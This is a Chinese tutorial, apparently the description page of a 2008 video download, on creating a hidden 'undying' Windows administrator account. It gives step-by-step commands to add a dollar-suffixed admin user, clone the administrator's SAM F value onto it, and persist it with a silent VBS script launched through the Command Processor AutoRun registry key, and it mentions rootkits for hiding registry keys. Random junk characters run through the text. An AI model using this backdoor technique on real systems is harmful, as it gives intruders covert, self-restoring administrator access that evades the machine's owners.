创建不死帐号

软件简介：
  s8 r9 Q4 D9 f0 x大家好，今天给大家做的动画是建立不死帐户。

4 z( }  i) ?$ v* o) X; Y1.首先我们在DOS下建立一个用户
8 n" G& V  v) k$ U0 ~2 Bnet user yecha$ yecha /add
! y8 y$ C' B# d$ p建立用户yecha$
; s; `1 H4 d# v$ l; k8 z0 S- X+ F
net localgroup administrators yecha$ /add
将yecha$提升到管理员组
' A' @' l, Y+ T3 Q2.接着打开注册表，输入：regedit，我们找到HKEY_LOCAL_MACHINE\SAM\SAM，这个时候SAM项是打不开的，我们要给他相应的权限。添加你现在登陆系统的用户，给他完全控制的权限，然后刷新，就可以打开！
+ T0 K3 z. h& ]( @- O  y5 DHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 来到这里，我们找到刚刚建立的用户
yecha$。再将yecha$的相关项导出，yecha$对用的F值导出。最后导出administrator的F值。
8 F+ ]& y8 J/ ^  W6 ]& g3.在DOS下将yecha$用户删除，然后我们将administrator的F值复制给yecha$。
/ ~- g" _% H# q1 G0 W& s! @" \/ h 将修改后的yecha$注册表信息导入注册表。

9 @0 r6 W7 F2 n6 f4.OK，这个时候大家可能会问这样做有什么意思呢？而且这种简单的建立帐户早就会了。当然我知道很多朋友都会这种方法来建立隐藏帐户，因为到了这一步的时候在CMD下和本地用户和组里都查看不到我们建立的这个用户！唯一存在的就是在我们的注册表里仍然有这个用户。
说到这里，我想到的就是两种思路:
一是想办法在注册表里将我们的这个用户所在注册表的键值隐藏。
二是管理员在注册表里把我们的这个用户所在注册表的键值删掉后，我们怎么能让它再自动创建。
! y. ?6 l1 a" T7 B第一种方法我不想讲了，如果大家这几天一直看我教程的话，就知道用rootkit就可以隐藏注册表键值。
. j) {; x# {* ^; ]! B* @6 v  J用ROOTKIT这款DOS下的超级隐藏工具完全可以轻松做到这一点！
8 Z  s: P5 h5 B/ q第二种方法就是今天我讲到的。
KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
在注册表中这个项起什么作用大家知道吗？没错，他起到的作用就是打开CMD自动运行我们编辑好的脚本文件。只要在AutoRun键值中输入我们的脚本路径就OK。
3 H7 v8 @: G: o/ i* p8 G那我们可以建立一个自动导入注册表的脚本文件：
On Error Resume Next
set yecha=wscript.createobject(wscript.shell)
yecha.run regedit.exe /s yecha$.reg,0
1 X$ ]8 Z* `* a+ q4 Cyecha.run regedit.exe /s yechaF.reg,0
, Q0 S( j+ K# b+ y# ^% Q将它保存为VBS文件后，放到一个隐蔽的路径下。 好，这个时候我们手工把注册表里的yecha$这个键值删掉，模仿管理员的操作。 好，我们删掉，可是管理员会经常使用CMD命令查看一些信息，这个时候比如管理员要查看机器开了哪些端口，他就执行CMD命令.看，他刚刚打开CMD窗口，结果我们的用户信息又都回来了。。。怎么样？很好的方法吧？
这样当我们每次运行CMD命令的时候就会自动运行我们的脚本文件。思路就是这样了。
7 z) N" y- Q6 U+ A# m那我们实验以下，我们能用yecha$这个用户登陆不。等一下，机器有点卡了。没有问题！
! v- v7 f1 |5 ?3 D0 g7 x好了，今天的教程就做到这，如果有什么不懂的可以加QQ群：47688744 新建不到4天。希望大家多来交流。。。
下载地址：

2008-8-19 13:46 上传 创建不死帐号.rar

下载权限:

版本vip会员

本地下载 检测资源

有些游戏资源需要vip下载开通请点击开通vip